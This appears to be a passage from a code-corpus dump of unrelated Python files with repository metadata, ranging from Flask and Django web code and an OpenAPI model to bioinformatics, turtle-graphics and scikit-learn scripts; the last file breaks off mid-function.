return render_template("news/user_news_list.html",data = data)
@profile_blue.route("/news_release",methods = ["GET","POST"])
@user_login_data
def news_release():
if request.method == "GET":
# 首先获取到新闻分类,然后传递到模板页码,进行展示
category_list = Category.query.all()
categorys = []
for category in category_list:
categorys.append(category.to_dict())
# 删除列表当中0的元素
categorys.pop(0)
data = {
"categories":categorys
}
return render_template("news/user_news_release.html",data = data)
# 获取到表单页码提交过来的数据,获取的是用户发布的新闻数据
title = request.form.get("title")
category_id = request.form.get("category_id")
digest = request.form.get("digest")
index_image = request.files.get("index_image")
content = request.form.get("content")
if not all([title,category_id,digest,index_image,content]):
return jsonify(errno = RET.PARAMERR,errmsg = "参数错误")
user = g.user
index_image = index_image.read()
key = storage(index_image)
# 用户发布完成之后,我们需要把当前发布的新闻存储到数据
news = News()
news.title = title
news.source = "个人来源"
news.digest = digest
news.content = content
news.index_image_url = constants.QINIU_DOMIN_PREFIX + key
news.category_id = category_id
news.user_id = user.id
# 当前的状态1表示正在审核中
news.status = 1
db.session.add(news)
db.session.commit()
return jsonify(errno = RET.OK,errmsg = "发布成功")
@profile_blue.route("/collection")
@user_login_data
def collection():
# 当前表示用户所有收藏的新闻,获取所有新闻涉及到分页,那么肯定是从第一页开始
page = request.args.get("p",1)
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
user = g.user
# 获取到当前登陆用户的所有的收藏新闻列表
# 第一个参数表示页码
# 第二个参数表示当前每个页码一共有多少条数据
paginate = user.collection_news.paginate(page,10,False)
items = paginate.items
current_page = paginate.page
total_page = paginate.pages
collections = []
for item in items:
collections.append(item.to_dict())
data = {
"collections":collections,
"current_page":current_page,
"total_page":total_page,
}
return render_template("news/user_collection.html",data = data)
"""修改密码"""
@profile_blue.route("/pass_info",methods = ["GET","POST"])
@user_login_data
def pass_info():
if request.method == "GET":
return render_template("news/user_pass_info.html")
user = g.user
old_password = request.json.get("old_password")
new_password = request.json.get("new_password")
if not all([old_password,new_password]):
return jsonify(errno = RET.PARAMERR,errmsg = "请输入密码")
# 判断旧的密码是否正确,只有当旧密码正确,才能修改新的密码
if not user.check_password(old_password):
return jsonify(errno = RET.PARAMERR,errmsg = "旧密码错误")
# 如果旧密码正确,那么直接更新到当前的数据库里面
user.password = new_password
db.session.commit()
return jsonify(errno = RET.OK,errmsg = "密码修改成功")
@profile_blue.route("/pic_info",methods= ["GET","POST"])
@user_login_data
def pic_info():
user = g.user
if request.method == "GET":
data = {
"user_info": user.to_dict() if user else None
}
return render_template("news/user_pic_info.html", data=data)
avatar = request.files.get("avatar").read()
# 如果上传成功,那么就会返回一个url地址,或者叫做key
# 如果想在浏览器里面浏览刚刚 上传的图片,那么必须通过
# 七牛的地址 + 刚刚返回的url
# http: // oyucyko3w.bkt.clouddn.com / + url
url = storage(avatar)
user.avatar_url = url
db.session.commit()
return jsonify(errno = RET.OK,errmsg = "上传成功",data={"avatar_url": constants.QINIU_DOMIN_PREFIX + url})
"""修改个人信息"""
@profile_blue.route("/base_info",methods = ["GET","POST"])
@user_login_data
def base_info():
user = g.user
if request.method == "GET":
data = {
"user_info": user.to_dict() if user else None
}
return render_template("news/user_base_info.html",data = data)
nick_name = request.json.get("nick_name")
signature = request.json.get("signature")
gender = request.json.get("gender")
user.nick_name = nick_name
user.signature = signature
user.gender = gender
# 更新数据库
db.session.commit()
# 更新session里面的数据
session["nick_name"] = user.nick_name
return jsonify(errno = RET.OK,errmsg = "修改成功")
@profile_blue.route("/info")
@user_login_data
def info():
user = g.user
if not user:
# 重新跳转到首页
return redirect("/")
data = {
"user_info": user.to_dict() if user else None
}
return render_template("news/user.html",data = data) | [
"xwp_fullstack@163.com"
] | xwp_fullstack@163.com |
93d1c4b038d428ed57ee5e22dfd6aa42a7abb5be | d0168d08221da5bf95c0dd511efeecddc9b0a73d | /profiles/migrations/0001_initial.py | cdaa8070d22ad1710c0d0041619d3e087f6b3285 | [] | no_license | alexarirok/roret-farm-software | 900b5842c7b39c4a19543e138a719e4b496531a9 | aa23fd729351f0d045b2e310dc839a8b4d639c6d | refs/heads/master | 2021-04-08T21:03:59.709224 | 2020-05-01T00:07:53 | 2020-05-01T00:07:53 | 248,808,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 853 | py | # Generated by Django 3.0.5 on 2020-04-23 21:43
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('firstName', models.CharField(max_length=50, null=True)),
('lastName', models.CharField(max_length=50)),
('email', models.EmailField(blank=True, max_length=254)),
('phoneNumber', models.IntegerField(blank=True)),
('department', models.CharField(blank=True, max_length=30)),
('bio', models.TextField(blank=True, max_length=500)),
],
),
]
| [
"akorir233@gmail.com"
] | akorir233@gmail.com |
6166a19921057cbb6fd2c937922458411e917f51 | ffe147e443dbd3c4e42b923393bda72d73e2eb75 | /server.py | fa99c5174a8375ca68aa5bb3616f8b03aa750fac | [] | no_license | jwilson573/counter_assignment | cf7d4418f5f54198dcac8f2dd24e25d62702209d | b958f11f910dfed8b23b885e57c60f807fb47c77 | refs/heads/master | 2020-06-22T23:00:14.943527 | 2017-06-13T15:10:06 | 2017-06-13T15:10:06 | 94,226,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from flask import Flask, session, render_template, redirect, request
app = Flask(__name__)
app.secret_key = "TestKey"
counter = 0
def sessionCounter():
try:
session['counter'] += 1
except KeyError:
session['counter'] = 1
@app.route('/')
def index():
sessionCounter()
return render_template('index.html', counter=session['counter'])
@app.route('/plus2')
def plus2():
session['counter'] += 1
return redirect('/')
@app.route('/reset')
def reset():
session['counter'] = 0
return redirect('/')
app.run(debug=True) | [
"jonathon.b.wilson@gmail.com"
] | jonathon.b.wilson@gmail.com |
cb83f4850aea698f5ef2fc3ef219bd74922e880a | beb131847b4f9c3abb5bf7cc868a9c46ed460532 | /setup.py | 39be4f8b8143ba24a9c1f8c12cd7b883cd1d9dc5 | [
"MIT"
] | permissive | mfy68/MfyReport | 46755c7c32f5336ca47d58fad1562bfb2e6f7b8e | 44edd71372c72959e437e92b8fbd2ce78d0766d5 | refs/heads/master | 2023-07-15T16:06:24.845691 | 2021-08-14T03:12:43 | 2021-08-14T03:12:43 | 394,526,847 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | #-*- coding:utf8 -*- #
#-----------------------------------------------------------------------------------
# ProjectName: mfyreport
# FileName: setup
# Author: MingFeiyang
# Datetime: 2021/8/9 14:23
#-----------------------------------------------------------------------------------
from setuptools import setup, find_packages
with open("README.md", "r", encoding='utf8') as fh:
long_description = fh.read()
setup(
name='mfyreport',
version='1.1.3',
author='MingFeiyang',
author_email='mfy1102@163.com',
url='https://pypi.org/project/mfyreport',
long_description=long_description,
long_description_content_type="text/markdown",
install_requires=["Jinja2==2.10.1", "PyYAML==5.3.1","requests==2.24.0"],
packages=find_packages(),
package_data={
"": ["*.html",'*.md'],
},
python_requires='>=3.6',
classifiers=[
"Programming Language :: Python :: 3",
],
) | [
"88566917+mfy68@users.noreply.github.com"
] | 88566917+mfy68@users.noreply.github.com |
6e29a6e6c458214a2a869d88d2a4615e11373078 | adf2e802c7563e4b7b7cc279a54deceb6a803098 | /openapi_client/models/pdf_annotate_parameters.py | 9dc6b17b59f3a07476f94e6f5e9c90548eeb50bf | [] | no_license | Orpalis/passportpdfsdk-python | 2466f7568becf2bd386bd9e4e00b4e3c1e642727 | 257d305ca9e6508d44fe521a1e4721f1835e8d0e | refs/heads/master | 2022-04-24T15:58:21.257112 | 2020-04-27T11:09:37 | 2020-04-27T11:09:37 | 254,665,250 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,981 | py | # coding: utf-8
"""
PassportPDF API
Another brick in the cloud # noqa: E501
The version of the OpenAPI document: 1.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class PdfAnnotateParameters(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'file_id': 'str',
'page_range': 'str',
'annotation_type': 'AnnotationType',
'sticky_note_annotation_parameters': 'StickyNoteAnnotationParameters',
'link_annotation_parameters': 'LinkAnnotationParameters',
'free_text_annotation_parameters': 'FreeTextAnnotationParameters',
'line_annotation_parameters': 'LineAnnotationParameters',
'square_and_circle_annotation_parameters': 'SquareAndCircleAnnotationParameters',
'rubber_stamp_annotation_parameters': 'RubberStampAnnotationParameters'
}
attribute_map = {
'file_id': 'FileId',
'page_range': 'PageRange',
'annotation_type': 'AnnotationType',
'sticky_note_annotation_parameters': 'StickyNoteAnnotationParameters',
'link_annotation_parameters': 'LinkAnnotationParameters',
'free_text_annotation_parameters': 'FreeTextAnnotationParameters',
'line_annotation_parameters': 'LineAnnotationParameters',
'square_and_circle_annotation_parameters': 'SquareAndCircleAnnotationParameters',
'rubber_stamp_annotation_parameters': 'RubberStampAnnotationParameters'
}
def __init__(self, file_id=None, page_range=None, annotation_type=None, sticky_note_annotation_parameters=None, link_annotation_parameters=None, free_text_annotation_parameters=None, line_annotation_parameters=None, square_and_circle_annotation_parameters=None, rubber_stamp_annotation_parameters=None, local_vars_configuration=None): # noqa: E501
"""PdfAnnotateParameters - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._file_id = None
self._page_range = None
self._annotation_type = None
self._sticky_note_annotation_parameters = None
self._link_annotation_parameters = None
self._free_text_annotation_parameters = None
self._line_annotation_parameters = None
self._square_and_circle_annotation_parameters = None
self._rubber_stamp_annotation_parameters = None
self.discriminator = None
self.file_id = file_id
self.page_range = page_range
if annotation_type is not None:
self.annotation_type = annotation_type
if sticky_note_annotation_parameters is not None:
self.sticky_note_annotation_parameters = sticky_note_annotation_parameters
if link_annotation_parameters is not None:
self.link_annotation_parameters = link_annotation_parameters
if free_text_annotation_parameters is not None:
self.free_text_annotation_parameters = free_text_annotation_parameters
if line_annotation_parameters is not None:
self.line_annotation_parameters = line_annotation_parameters
if square_and_circle_annotation_parameters is not None:
self.square_and_circle_annotation_parameters = square_and_circle_annotation_parameters
if rubber_stamp_annotation_parameters is not None:
self.rubber_stamp_annotation_parameters = rubber_stamp_annotation_parameters
@property
def file_id(self):
"""Gets the file_id of this PdfAnnotateParameters. # noqa: E501
The identifier of the previously uploaded file to be processed. # noqa: E501
:return: The file_id of this PdfAnnotateParameters. # noqa: E501
:rtype: str
"""
return self._file_id
@file_id.setter
def file_id(self, file_id):
"""Sets the file_id of this PdfAnnotateParameters.
The identifier of the previously uploaded file to be processed. # noqa: E501
:param file_id: The file_id of this PdfAnnotateParameters. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and file_id is None: # noqa: E501
raise ValueError("Invalid value for `file_id`, must not be `None`") # noqa: E501
self._file_id = file_id
@property
def page_range(self):
"""Gets the page_range of this PdfAnnotateParameters. # noqa: E501
Specifies the page or the range of page to be annotated. # noqa: E501
:return: The page_range of this PdfAnnotateParameters. # noqa: E501
:rtype: str
"""
return self._page_range
@page_range.setter
def page_range(self, page_range):
"""Sets the page_range of this PdfAnnotateParameters.
Specifies the page or the range of page to be annotated. # noqa: E501
:param page_range: The page_range of this PdfAnnotateParameters. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and page_range is None: # noqa: E501
raise ValueError("Invalid value for `page_range`, must not be `None`") # noqa: E501
self._page_range = page_range
@property
def annotation_type(self):
"""Gets the annotation_type of this PdfAnnotateParameters. # noqa: E501
:return: The annotation_type of this PdfAnnotateParameters. # noqa: E501
:rtype: AnnotationType
"""
return self._annotation_type
@annotation_type.setter
def annotation_type(self, annotation_type):
"""Sets the annotation_type of this PdfAnnotateParameters.
:param annotation_type: The annotation_type of this PdfAnnotateParameters. # noqa: E501
:type: AnnotationType
"""
self._annotation_type = annotation_type
@property
def sticky_note_annotation_parameters(self):
"""Gets the sticky_note_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:return: The sticky_note_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:rtype: StickyNoteAnnotationParameters
"""
return self._sticky_note_annotation_parameters
@sticky_note_annotation_parameters.setter
def sticky_note_annotation_parameters(self, sticky_note_annotation_parameters):
"""Sets the sticky_note_annotation_parameters of this PdfAnnotateParameters.
:param sticky_note_annotation_parameters: The sticky_note_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:type: StickyNoteAnnotationParameters
"""
self._sticky_note_annotation_parameters = sticky_note_annotation_parameters
@property
def link_annotation_parameters(self):
"""Gets the link_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:return: The link_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:rtype: LinkAnnotationParameters
"""
return self._link_annotation_parameters
@link_annotation_parameters.setter
def link_annotation_parameters(self, link_annotation_parameters):
"""Sets the link_annotation_parameters of this PdfAnnotateParameters.
:param link_annotation_parameters: The link_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:type: LinkAnnotationParameters
"""
self._link_annotation_parameters = link_annotation_parameters
@property
def free_text_annotation_parameters(self):
"""Gets the free_text_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:return: The free_text_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:rtype: FreeTextAnnotationParameters
"""
return self._free_text_annotation_parameters
@free_text_annotation_parameters.setter
def free_text_annotation_parameters(self, free_text_annotation_parameters):
"""Sets the free_text_annotation_parameters of this PdfAnnotateParameters.
:param free_text_annotation_parameters: The free_text_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:type: FreeTextAnnotationParameters
"""
self._free_text_annotation_parameters = free_text_annotation_parameters
@property
def line_annotation_parameters(self):
"""Gets the line_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:return: The line_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:rtype: LineAnnotationParameters
"""
return self._line_annotation_parameters
@line_annotation_parameters.setter
def line_annotation_parameters(self, line_annotation_parameters):
"""Sets the line_annotation_parameters of this PdfAnnotateParameters.
:param line_annotation_parameters: The line_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:type: LineAnnotationParameters
"""
self._line_annotation_parameters = line_annotation_parameters
@property
def square_and_circle_annotation_parameters(self):
"""Gets the square_and_circle_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:return: The square_and_circle_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:rtype: SquareAndCircleAnnotationParameters
"""
return self._square_and_circle_annotation_parameters
@square_and_circle_annotation_parameters.setter
def square_and_circle_annotation_parameters(self, square_and_circle_annotation_parameters):
"""Sets the square_and_circle_annotation_parameters of this PdfAnnotateParameters.
:param square_and_circle_annotation_parameters: The square_and_circle_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:type: SquareAndCircleAnnotationParameters
"""
self._square_and_circle_annotation_parameters = square_and_circle_annotation_parameters
@property
def rubber_stamp_annotation_parameters(self):
"""Gets the rubber_stamp_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:return: The rubber_stamp_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:rtype: RubberStampAnnotationParameters
"""
return self._rubber_stamp_annotation_parameters
@rubber_stamp_annotation_parameters.setter
def rubber_stamp_annotation_parameters(self, rubber_stamp_annotation_parameters):
"""Sets the rubber_stamp_annotation_parameters of this PdfAnnotateParameters.
:param rubber_stamp_annotation_parameters: The rubber_stamp_annotation_parameters of this PdfAnnotateParameters. # noqa: E501
:type: RubberStampAnnotationParameters
"""
self._rubber_stamp_annotation_parameters = rubber_stamp_annotation_parameters
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PdfAnnotateParameters):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, PdfAnnotateParameters):
return True
return self.to_dict() != other.to_dict()
| [
"e.carrere@orpalis.com"
] | e.carrere@orpalis.com |
1fcb9a5bc116b70cacd5ddbd3646b35b3f6e0d8c | e0527bce5c53a196752d3a16adf50cb60754de5f | /05-How to Repeat Actions demos/02-dotty_dots.py | 47bb00a38d29385492c81d3cb4b98ea027472cab | [] | no_license | ARWA-ALraddadi/python-tutorial-for-beginners | ddeb657f419fbc176bea273bc9fb6b88d1894191 | 21cedfc47871ca4d25c2382464c60ab0a2121205 | refs/heads/master | 2023-06-30T20:24:30.688800 | 2021-08-08T08:22:29 | 2021-08-08T08:22:29 | 193,094,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,825 | py | #---------------------------------------------------------------------
#
# Dotty dots - Repeating actions with minor variations
#
# Up until now the only repetition we've seen has been the same action
# done many times. This simple demonstration shows how actions can
# be repeated with minor variations for each different value in a
# list.
#
# The program simply draws a grid of multi-coloured dots. Experiment
# with the code to produce different patterns!
#
# Some useful constant values, all in pixels
canvas_size = 600
max_coord = 250
grid_size = 20
dot_size = 15
# Set up a drawing canvas with a black background
from turtle import *
setup(canvas_size, canvas_size)
title("Dotty dots")
bgcolor('black')
# Set up some drawing characteristics
penup()
speed('fastest')
# Define a list of colours
column_colours = ['red', 'green', 'blue', 'yellow', 'white', 'orange',
'aqua', 'olive', 'misty rose', 'salmon', 'spring green',
'fuchsia', 'deep sky blue', 'silver', 'aquamarine',
'orange red', 'seashell', 'chocolate', 'light steel blue',
'tomato', 'chartreuse', 'bisque', 'dark orchid',
'powder blue', 'gainsboro']
# Determine how many rows we can fit between the maximum
# and minimum y-coords, separated by the given grid size
number_of_rows = max_coord * 2 // grid_size
# Do the same action multiple times, with the only
# difference being the row number
for row_number in range(number_of_rows):
# Go to the start of the row
goto(-max_coord, max_coord - row_number * grid_size)
# Do the same action multiple times, with the only
# difference being the colour
for colour in column_colours:
color(colour)
dot(dot_size)
forward(grid_size)
# Exit gracefully
hideturtle()
done()
| [
"noreply@github.com"
] | noreply@github.com |
22f3c9cd4a9a1004dd7c7bb512643d2bbf2cbdb2 | 048405bfa0b48eaf78dd2298bdfe61472bd74eef | /scripts/multiproc.py | d0bf77fe6d0ed47a785ac752a9bddf3529d5e1ed | [] | no_license | sousa-edvan/greedy_grasp_ant | 2218ae20f707baa8d5428db76129e5c758a21d07 | 12f5ac99b4d0e9599a2ecd138f8f6a3551fe2473 | refs/heads/master | 2022-01-27T02:30:35.977782 | 2019-07-19T16:39:20 | 2019-07-19T16:39:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | import os
import pandas as pd
import subprocess
from multiprocessing import cpu_count, Pool
from auto_tqdm import tqdm
from notipy_me import Notipy
def score(data):
csv = "scores/{data}.csv".format(data=data)
subprocess.run([
"./gga/greedy_grasp_ant",
"--data=data/{data}".format(data=data),
"--log={csv}".format(csv=csv),
"--all"
])
df = pd.read_csv(csv, index_col=0)[["mean"]]
df.columns = [data]
return df.T
data = os.listdir("data")
with Notipy():
with Pool(cpu_count()) as p:
df = pd.concat(list(tqdm(p.imap(score, data), total=len(data))))
df.to_csv("scores/all_scores.csv")
| [
"cappelletti.luca94@gmail.com"
] | cappelletti.luca94@gmail.com |
b74ad33e632198ba342a255f54d4a25b1116e952 | e040e5f33a443fa8ca313968a97471cf9d9db87c | /vagrant/tasks.py | 7094094b2f8d5d55fb20e7f4d2c1131ddd72ff8f | [] | no_license | chrisseto/Archiver | 63605e977849274648195b231b06849e4f365152 | 849e30dd0f6fe177ecd0efd94a2b55d7993ebe02 | HEAD | 2016-09-11T06:34:50.692644 | 2014-09-04T19:46:41 | 2014-09-04T19:46:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,361 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from invoke import run, task
@task
def provision(inventory='hosts', user='vagrant', sudo=True, verbose=False, extra='', key='~/.vagrant.d/insecure_private_key'):
"""Run the site.yml playbook given an inventory file and a user. Defaults
to provisioning the vagrant box.
"""
play(playbook='site.yml',
inventory=inventory,
user=user,
sudo=sudo,
verbose=verbose, extra=extra, key=key)
@task
def play(playbook, inventory='hosts', user='vagrant', sudo=True, verbose=False, extra='', key=''):
"""Run a playbook. Defaults to using the vagrant inventory and vagrant user."""
print('[invoke] Playing {0!r} on {1!r} with user {2!r}...'.format(
playbook, inventory, user))
cmd = 'ansible-playbook {playbook} -i {inventory} -u {user}'.format(**locals())
if sudo:
cmd += ' -s'
if verbose:
cmd += ' -vvvv'
if key:
cmd += ' --private-key=%s' % key
if extra:
cmd += ' -e {0!r}'.format(extra)
print('[invoke] {0!r}'.format(cmd))
run(cmd, pty=True)
@task
def update():
run('ansible-playbook site.yml -i hosts -u vagrant --private-key ~/.vagrant.d/insecure_private_key -s --tags update', pty=True)
@task
def vagrant_recycle():
run('vagrant destroy -f')
run('vagrant up')
provision()
| [
"Chriskseto@gmail.com"
] | Chriskseto@gmail.com |
46716e05f494d85df10a692e589e37f999ee1bdd | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/CJ/16_0_2_anrieff_b.py | 9217d8d49f04d08baad00e10f7695015df8cedd7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 570 | py | #!/usr/bin/env python
# Contestant: Veselin 'anrieff' Georgiev
# Round: Google Code Jam Qualification 2016
# Task: B. Revenge of the pancakes
# Solution: Greedy. At each step, find the largest single-colored block at the top, and flip it, until we finish.
TC = int(raw_input().strip())
for tc in xrange(1, TC + 1):
print "Case #%d:" % tc,
a = list(raw_input().strip())
n = len(a)
steps = 0
while a.count('-') != 0:
steps += 1
i = 0
while i < n and a[i] == a[0]:
i += 1
for j in xrange(i):
a[j] = '-' if a[j] == '+' else '+' # reverse
print steps
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
89dffaba38711b93fdcb658ebbf0b28432889f78 | 113b962bd5e2eb770067bd374a15dfe8a1c2d09f | /py_scripts/get_mappedcount_byLibID.py | 8a5cee444afcf4ef2e1d1d2b47beaaa11f6be665 | [] | no_license | aungthurhahein/biotech_script | ecce51950bcef69405843da12ece2f84ea5541d6 | 2fda699343e6c46543fa1df2412c8ca2f2622cda | refs/heads/master | 2020-12-24T06:20:13.028141 | 2016-07-06T15:23:34 | 2016-07-06T15:23:34 | 25,574,741 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | """
# get occurences of ref_ids by Lib_IDs
# modification tips: file type, column of file ids
# __author__ = 'atrx'
# Date: 22012015
"""
import sys
from Bio import SeqIO
usage = "Usage %s infile" % sys.argv[0] # specific massage for no input
try:
fastafile = sys.argv[1]
contigid = sys.argv[2]
except:
print usage, sys.exit(1)
fasta_file = open(fastafile, 'r')
ref_file = open(contigid, 'r')
id_list = []
contig_list = []
id_key = []
for l in ref_file:
id = l.split()
id_list.append(l)
id_key.append(id[1].strip())
for seq in SeqIO.parse(fasta_file, "fasta"):
contig_list.append(seq.id)
for seq_record in contig_list:
contigid = seq_record.strip()
if contigid in id_key:
lo = id_key.index(contigid)
print id_list[lo].strip()
else:
print "0 " + seq_record
| [
"aungthurhahein@gmail.com"
] | aungthurhahein@gmail.com |
6d9695e33af76ad842572e35c2345d53cbad1a2a | 1b10cfc8ed350baea39e4d265d2378c3da4cd994 | /plugin-sim/local.py | 2c07a963cdc79cf8adee95b46bade25d12f3d13d | [
"MIT"
] | permissive | albertcrowley/coinstac-search | e382cc0ec401d42fd75a548e9f8d014b5fc02387 | 731d38644e1c7dc4c9b65fb986c824ed11a33e8c | refs/heads/master | 2020-03-29T23:16:00.571684 | 2020-02-24T19:52:01 | 2020-02-24T19:52:01 | 150,464,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,000 | py | #!/usr/bin/python
import subprocess
import sys
import json
import os
from nidm.experiment.tools.rest import RestParser
if 'DEBUG' in os.environ and os.environ['DEBUG'] == "1":
directory = '/opt/project/'
else:
directory = './'
#
# To run as a test:
#
# docker run -e "DEBUG=1" -v /home/crowley/coinstac-search/plugin-sim:/opt/project -w /opt/project -v /tmp:/mnt/data/local.py pynidm python local.py /opt/project/test_input.json
def log(s):
if 'DEBUG' in os.environ and os.environ['DEBUG'] == "1":
print(s)
else:
f = open("/mnt/data/local-log.txt", "a")
f.write(s)
f.write("\n")
f.close()
if len(sys.argv) > 1:
infile = open(sys.argv[1])
in_str = infile.read()
infile.close()
else:
in_str = sys.stdin.read()
log ("\n\n\n------------------------------------------------------------------------\n")
doc = json.loads(in_str)
filter = doc['input']['operation']
my_client_id = doc['state']['clientId']
log ("\nMy client ID is " + my_client_id); # ex local0
log("\nInput:\n" + in_str)
ttl_file = directory + my_client_id + '.nidm.ttl'
log('TTL File={}'.format(ttl_file))
uri = '/projects/'
restParser = RestParser(output_format=RestParser.OBJECT_FORMAT)
out = restParser.run( [ttl_file], uri )
log (json.dumps(out))
for project in out:
uri = '/statistics/projects/{}?{}'.format(project, filter)
log("\n&&& URI: {}\n".format(uri))
out = restParser.run( [ttl_file], uri)
output = {"output": {"result": out, "operation": uri}}
log(json.dumps(output, indent=2))
sys.stdout.write(json.dumps(output))
exit (0)
cmd = ['pynidm', 'query', '-nl', ttl_file, '-u', uri, '-j']
log(str(cmd))
try:
# we don't want the whole pipeline to break if this returns a non-zero exit code.
result = subprocess.check_output(cmd)
result = result.decode("utf-8")
except:
result = ""
output = {"output": {"result": result, "operation" : uri } }
log(json.dumps(output))
sys.stdout.write(json.dumps(output))
| [
"albert.crowley@tcg.com"
] | albert.crowley@tcg.com |
a57dcb96525131d56ec52c5f7b6ad9f742f6b551 | 2f28c2fb7c7322e98ab9954d1c45888dadd0da80 | /src/models/train_model.py | 681422b4f7ade0412828518149c46bba9c5cc67d | [
"MIT"
] | permissive | markanderson96/AMFMBirdActivity | 6dda0fab6590a05342a0cc07428201b2cfda75cc | 5f133b76dd6c85d09313d588df334f0cdb3feb09 | refs/heads/main | 2023-05-02T13:55:36.186033 | 2021-02-09T20:13:28 | 2021-02-09T20:13:28 | 329,428,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,167 | py | #!/bin/python
import pandas as pd
import numpy as np
import yaml
import logging
import sys
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score, KFold
from sklearn.ensemble import RandomForestClassifier, StackingClassifier
from sklearn.svm import SVC
from sklearn import metrics
from matplotlib import pyplot
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
def main():
""" Trains model based on parameters in config
"""
logger = logging.getLogger(__name__)
logger.info('training model')
dataset = config['general']['dataset']
features = 'data/features/' + dataset + '/features.csv'
df = pd.read_csv(features, index_col=None)
numeric_features = [
'amFreq',
'amDepth',
'amProminence',
'pitchMean',
'pitchVar',
'pitchSkew',
'pitchKurtosis',
'spectralCentroidMean',
'spectralCentroidVar',
'spectralRolloffMean',
'spectralRolloffVar'
]
numeric_data = df[numeric_features]
#basic scaling
numerical_transformer = Pipeline(steps=[
('Imputer', SimpleImputer(strategy='median', verbose=1)),
('Scaler', StandardScaler())],
verbose=False)
# Preprocessor operations
preprocessor = ColumnTransformer(
transformers=[
('Numerical Data', numerical_transformer, numeric_features)
],
verbose=False)
clf1 = Pipeline(steps=[
('Preprocessor', preprocessor),
('Random Forest', RandomForestClassifier(verbose=config['classifier']['verbose'],
criterion=config['random_forest']['criterion'],
max_depth=config['random_forest']['max_depth'],
min_samples_leaf=config['random_forest']['min_samples_leaf'],
n_estimators=config['random_forest']['n_estimators'],
class_weight='balanced',
n_jobs=-1))],
verbose=False)
clf2 = Pipeline(steps=[
('Preprocessor', preprocessor),
('SVM', SVC(verbose=config['classifier']['verbose'],
kernel=config['svm']['kernel'],
degree=config['svm']['degree'],
gamma=config['svm']['gamma'],
probability=config['svm']['probability'],
max_iter=config['svm']['max_iter']))],
verbose=False)
# put data back together
x_data = numeric_data
# labels
y_data = df['hasBird']
# Split data 80/20
x_train, x_test, y_train, y_test = train_test_split(x_data,
y_data,
test_size=config['classifier']['test_size'],
random_state=config['classifier']['random_state'],
shuffle=config['classifier']['shuffle'])
eclf = StackingClassifier(estimators=[
('rf', clf1), ('svm', clf2)],
final_estimator=SVC(),
n_jobs=-1,
passthrough=False,
verbose=0)
clf1.fit(x_train, y_train)
y_pred = clf1.predict(x_test)
print('Random Forest')
report(y_test, y_pred)
clf2.fit(x_train, y_train)
y_pred = clf2.predict(x_test)
print('SVM')
report(y_test, y_pred)
eclf.fit(x_train, y_train)
